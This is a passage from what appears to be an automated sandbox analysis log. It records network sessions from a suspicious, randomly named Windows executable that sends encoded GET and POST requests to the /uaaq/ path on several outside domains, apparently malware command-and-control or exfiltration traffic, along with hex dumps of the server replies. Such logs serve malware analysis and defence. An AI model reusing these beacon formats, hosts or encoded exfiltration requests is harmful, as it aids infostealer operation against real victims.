                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwb5zS1leh3ajT+Or/bsQmxuWxAYaXs3Gj8TkOukBKD5Wk/erGM237GCCH8K0zWDMHgdnuXF7Dm7PrPNwMb8x5nPIpiSSVAiyymAxqYnHszTxHc7QF6BCgcDWFmILBVKnerLHiDA7cZM9qkyFTUiCeViIW3ytiuo8RUYYDyO3t8henOFICq082ufUGjPn2fTC0CgqURNDRMgcFF7DxjG5+pWImUcdyhRzgUgwoDjHyVlDqJHlywJ2YdDtYeHzn78zUUzHkZ30c12amu/sSfSa+Q5TRnAwi4b92KKtv5EYME27pyb0xmha6ar91r0++e6PBaWXchys8xVltsmYquZvMlej2FiYivPxg8MxisMAI/OFPa+RZzRuZlRok75kgFl5aVbpzbyslH8f9m+5S/ud0E5lCNQR1VHdnTbWDIkR4nCC49sXNFEwYv3Rm222ktRn0O4+61/Vc0S3Bptbd4SmVeTUNhPeUEgwbhkK5qtF0R6ccxCfa7FdqfPj40T2zVViG6Udp3BvZzPccWa3/YLmEK74n7+G6Fcg6EL/aW8i3XnjCDJchaGdSP+lkB8m/l4kFmORr0kbXQ8Hc1yPeQMwpaCwJgqVya4pfSBwVhPilzuXgNAQU2rukxnYeF7YinfGVZsJVbubrUE+Gp/tAzqUUWZTscHY05uC67VfsNvgUQjTp4B30L5+QZ6HH01tBGxwqnHnhlcqFpecdojnzlQHBjadXeVx3958D4C8ximnIXHwX7sHH7i+JrxRr8GsSoRBJPm4/T4OazXQLiLfk81DobssN8JSodS4m5faiv+XxpFWj3YA6XL7nRN/KKT3xnj9pzvrEsWOHo7+00xuHhGmofTX0d7pzI6x56IsZyEowpM6Z5mPPC3qQoeun2Xw+kEuEKmAN4+A6m5Q9jgSmOePRuwvCk2/imOxXvKeh8WfQ4od2I9UQiBq9OobN1M9/sCD67vM90BwwXCA0dWBTP2SSeyan+xExqVP6mRBHB9kyzLkV32gOxqfpRr7f4B2fH17DaaFV99Vbmfe68Ox2vNQYNQ8QQCpKT/0aW3R19sia7cHJZKyJ1f1RWIz/AhxhdvjQ2+tH768F99+YwlbY
                                                                                    Dec 4, 2023 12:04:53.916392088 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:53 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:53.916464090 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.11.3049774133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:56.431895971 CET429OUTGET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:56.721803904 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:56 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:56.721887112 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.11.304977591.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:02.047329903 CET695OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 49 74 38 42 41 61 6b 31 2f 77 52 51 68 44 6c 71 6d 58 74 68 76 59 6f 7a 4b 4e 66 4b 46 73 53 45 75 4e 4e 64 72 6e 73 53 41 74 76 59 4a 70 33 4d 63 37 6d 53 47 56 77 70 47 61 7a 47 59 48 46 2b 33 58 42 5a 71 6a 62 44 6d 78 45 61 6b 50 6a 58 74 56 6a 50 4e 56 44 63 55 2f 58 56 73 30 52 38 43 53 78 4f 39 77 70 4d 4e 31 30 4e 54 56 75 67 47 38 59 61 4d 2f 51 6a 53 67 71 65 38 4c 2f 41 42 31 4b 76 66 33 64 5a 6b 53 54 6c 43 59 78 55 65 48 77 39 35 2b 30 71 49 54 54 66 48 57 46 55 5a 6d 75 4e 50 77 4e 61 68 49 48 72 42 55 4b 6a 46 67 3d 3d
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhDlqmXthvYozKNfKFsSEuNNdrnsSAtvYJp3Mc7mSGVwpGazGYHF+3XBZqjbDmxEakPjXtVjPNVDcU/XVs0R8CSxO9wpMN10NTVugG8YaM/QjSgqe8L/AB1Kvf3dZkSTlCYxUeHw95+0qITTfHWFUZmuNPwNahIHrBUKjFg==
                                                                                    Dec 4, 2023 12:05:02.230380058 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:05:02 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.11.304977691.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:04.749331951 CET715OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 49 74 38 42 41 61 6b 31 2f 77 52 51 68 6a 31 71 6e 30 46 68 71 34 6f 30 57 64 66 4b 50 4d 53 49 75 4e 42 64 72 6c 41 34 41 66 37 59 4a 49 48 4d 64 36 6d 53 48 56 77 70 4e 36 7a 48 53 6e 46 50 33 58 64 2f 71 68 66 44 6d 77 67 61 6b 4b 6e 58 74 6b 6a 4d 4d 46 44 61 66 66 58 58 6a 55 52 38 43 53 78 4f 39 77 39 6d 4e 31 73 4e 54 6d 32 67 48 64 59 5a 42 66 51 69 43 51 71 65 74 37 2f 45 42 31 4c 43 66 32 42 33 6b 55 58 6c 43 64 4e 55 66 57 77 79 71 65 30 73 4d 54 53 2b 49 7a 63 35 55 6e 50 56 47 44 35 56 2f 5a 53 31 41 42 6d 77 43 63 36 4c 6a 6a 46 50 30 6d 69 6b 2f 52 64 59 71 62 78 75 2b 34 38 3d
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhj1qn0Fhq4o0WdfKPMSIuNBdrlA4Af7YJIHMd6mSHVwpN6zHSnFP3Xd/qhfDmwgakKnXtkjMMFDaffXXjUR8CSxO9w9mN1sNTm2gHdYZBfQiCQqet7/EB1LCf2B3kUXlCdNUfWwyqe0sMTS+Izc5UnPVGD5V/ZS1ABmwCc6LjjFP0mik/RdYqbxu+48=
                                                                                    Dec 4, 2023 12:05:04.941766977 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:05:04 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.11.304977791.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:07.451911926 CET1632OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 49 74 38 42 41 61 6b 31 2f 77 52 51 68 6a 31 71 6e 30 46 68 71 34 6f 30 57 64 66 4b 50 4d 53 49 75 4e 42 64 72 6c 41 34 41 66 6a 59 49 36 6a 4d 63 64 61 53 41 56 77 70 41 61 7a 43 53 6e 46 53 33 58 56 37 71 68 44 54 6d 79 6f 61 6c 73 62 58 72 57 4c 4d 44 46 44 61 51 2f 58 55 73 30 52 4d 43 53 67 46 39 77 74 6d 4e 31 73 4e 54 6a 36 67 52 38 59 5a 53 76 51 6a 53 67 71 73 38 4c 2f 6f 42 78 6e 38 66 32 45 43 6b 6c 72 6c 43 39 39 55 64 6b 6f 79 70 2b 30 75 4c 54 53 63 49 7a 59 36 55 6d 69 6b 47 41 6b 2b 2f 61 43 31 45 56 58 61 61 39 61 71 32 69 56 57 38 32 4b 44 34 6b 64 48 32 4a 41 6b 2f 76 65 62 4a 6f 77 65 37 38 4b 34 47 4f 77 30 31 77 7a 72 54 70 68 33 68 2f 76 52 6e 46 42 31 45 65 50 4b 65 67 52 53 57 6b 48 56 69 63 68 64 4b 78 41 4b 47 5a 65 63 51 43 7a 55 6f 6b 30 48 50 33 39 38 48 2b 4f 36 65 63 75 38 36 6b 34 65 4d 55 54 69 2f 37 69 59 57 62 43 62 64 36 4e 7a 4b 35 42 69 7a 41 64 48 38 33 5a 4d 49 76 57 59 63 6f 77 61 6e 38 64 67 42 63 58 4b 49 4c 53 56 34 2f 45 4b 73 58 6b 66 4c 39 77 7a 43 32 35 44 61 56 32 37 52 4f 62 4d 79 63 69 54 65 34 53 34 54 65 57 79 48 42 79 36 74 4d 39 52 70 4a 63 71 55 70 4b 57 5a 47 34 77 33 4b 65 66 70 48 38 45 4b 7a 55 75 4c 2b 30 57 64 6f 69 51 31 69 57 6a 46 70 65 67 49 72 67 36 68 38 72 71 5a 75 68 6e 49 4d 53 53 46 45 55 50 44 50 4d 64 6e 59 32 6a 77 64 33 71 6a 57 48 63 37 42 75 6e 6f 62 70 72 55 4b 50 6a 64 67 67 6f 4c 67 2f 71 62 50 69 78 56 48 61 33 72 53 43 59 64 73 45 36 75 43 6f 54 4c 43 52 30 6c 54 52 50 46 65 55 64 62 63 68 31 73 79 62 4f 4f 4c 62 2b 32 5a 74 33 4a 71 71 2f 51 73 78 5a 49 7a 61 49 4a 4e 74 31 6f 65 50 57 4f 42 77 43 66 35 73 5a 43 70 71 6c 47 75 49 38 46 32 55 64 64 34 54 4f 64 6d 6e 55 65 55 35 52 45 47 54 36 42 63 67 62 4c 4f 61 51 30 46 73 53 58 67 41 30 58 64 35 47 64 50 35 52 64 79 46 50 37 49 62 54 63 65 31 64 57 7a 6c 67 2b 46 4d 72 4d 4c 4a 70 43 52 6e 4a 4f 58 6c 66 31 57 46 50 78 4f 4d 68 67 36 45 48 51 62 44 31 73 36 76 53 75 50 75 2f 7a 63 74 61 37 62 70 74 73 5a 64 4e 4f 68 61 6a 73 6c 32 4e 32 52 6c 31 6b 63 35 73 33 54 34 56 64 56 70 76 4d 65 4a 6c 37 43 75 65 41 38 7a 44 4b 65 73 53 71 39 49 6f 79 2f 55 7a 47 72 33 44 59 36 7a 4e 49 56 56 55 61 4f 48 38 6a 4b 6b 61 72 42 70 41 49 69 39 73 2f 6d 48 35 56 72 48 62 43 2b 45 6a 4e 43 69 38 56 34 6d 69 7a 76 49 47 34 63 7a 33 4e 64 4d 38 42 45 36 6d 35 7a 36 4f 50 66 30 58 4e 35 43 4e 7a 36 78 6b 7a 65 69 71 6c 6e 51 69 6f 64 6b 35 63 4b 37 67 62 6f 49 51 45 61 6b 48 51 61 77 58 6b 54 68 46 4a 2b 45 63 4b 41 2f 51 75 61 43 6c 77 74 52 4f 69 52 67 49 65 78 39 78 74 49 37 4d 58 48 4e 59 44 57 33 73 76 61 4a 4d 64 2f 78 44 69 78 33 68 37 66 6d 47 2f 68 56 49 6c 6f 44 4d 45 77 72 4f 44 51 59 39 68 6c 61 63 33 43 33 46 69 66 32 72 43 31 51 52 79 45 64 70 56 39 69 51 30 43 71 55 65 55 73 48 6a 32 51 59 71 44 75 61 73 38 53 42 52 75 41 48 31 62 70 70 79 31 31 50 4c 34 59 33 69 47 38 62 35 79 69 71 4a 4d 6b 54 78 36 4b 42 46 42 2b 69 51 4e 4b 2b 55 66 70 52 48 44 77 4f 78 66 74 67 52 43 53 4b 2f 42 4c 59 51 6a 61 46 55 59 32 45 4c 47 46 2f 70 32 59 34 6b 48 37 38 49 2b 6a 69 2b 73 35 4e 42 51 5a 50 51 41 54 48 50 42 64 2f 74 7a 6e 42 6b 4b 6e 66 78 74 76 6c 62 70 78 32 42 4c 34 53 58 42 6b 4e 6f 44 31 59 46 39 58 2f 7a 78 78 51 67 4a 5a 38 48 4f 55 74 50 4d 4a 73 75 78 41 6d 4c 30 69 53 46 4d 43 2b 55 7a 41 54 64 77 57 64 58 4f 2f 55 59 62 30 45 57 6c 5a 55 43 55 48 54
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhj1qn0Fhq4o0WdfKPMSIuNBdrlA4AfjYI6jMcdaSAVwpAazCSnFS3XV7qhDTmyoalsbXrWLMDFDaQ/XUs0RMCSgF9wtmN1sNTj6gR8YZSvQjSgqs8L/oBxn8f2ECklrlC99Udkoyp+0uLTScIzY6UmikGAk+/aC1EVXaa9aq2iVW82KD4kdH2JAk/vebJowe78K4GOw01wzrTph3h/vRnFB1EePKegRSWkHVichdKxAKGZecQCzUok0HP398H+O6ecu86k4eMUTi/7iYWbCbd6NzK5BizAdH83ZMIvWYcowan8dgBcXKILSV4/EKsXkfL9wzC25DaV27RObMyciTe4S4TeWyHBy6tM9RpJcqUpKWZG4w3KefpH8EKzUuL+0WdoiQ1iWjFpegIrg6h8rqZuhnIMSSFEUPDPMdnY2jwd3qjWHc7BunobprUKPjdggoLg/qbPixVHa3rSCYdsE6uCoTLCR0lTRPFeUdbch1sybOOLb+2Zt3Jqq/QsxZIzaIJNt1oePWOBwCf5sZCpqlGuI8F2Udd4TOdmnUeU5REGT6BcgbLOaQ0FsSXgA0Xd5GdP5RdyFP7IbTce1dWzlg+FMrMLJpCRnJOXlf1WFPxOMhg6EHQbD1s6vSuPu/zcta7bptsZdNOhajsl2N2Rl1kc5s3T4VdVpvMeJl7CueA8zDKesSq9Ioy/UzGr3DY6zNIVVUaOH8jKkarBpAIi9s/mH5VrHbC+EjNCi8V4mizvIG4cz3NdM8BE6m5z6OPf0XN5CNz6xkzeiqlnQiodk5cK7gboIQEakHQawXkThFJ+EcKA/QuaClwtROiRgIex9xtI7MXHNYDW3svaJMd/xDix3h7fmG/hVIloDMEwrODQY9hlac3C3Fif2rC1QRyEdpV9iQ0CqUeUsHj2QYqDuas8SBRuAH1bppy11PL4Y3iG8b5yiqJMkTx6KBFB+iQNK+UfpRHDwOxftgRCSK/BLYQjaFUY2ELGF/p2Y4kH78I+ji+s5NBQZPQATHPBd/tznBkKnfxtvlbpx2BL4SXBkNoD1YF9X/zxxQgJZ8HOUtPMJsuxAmL0iSFMC+UzATdwWdXO/UYb0EWlZUCUHT
                                                                                    Dec 4, 2023 12:05:07.635247946 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:05:07 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.11.304977891.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:10.154187918 CET425OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:10.336791039 CET161INHTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:05:10 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.11.304977965.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:15.980943918 CET713OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
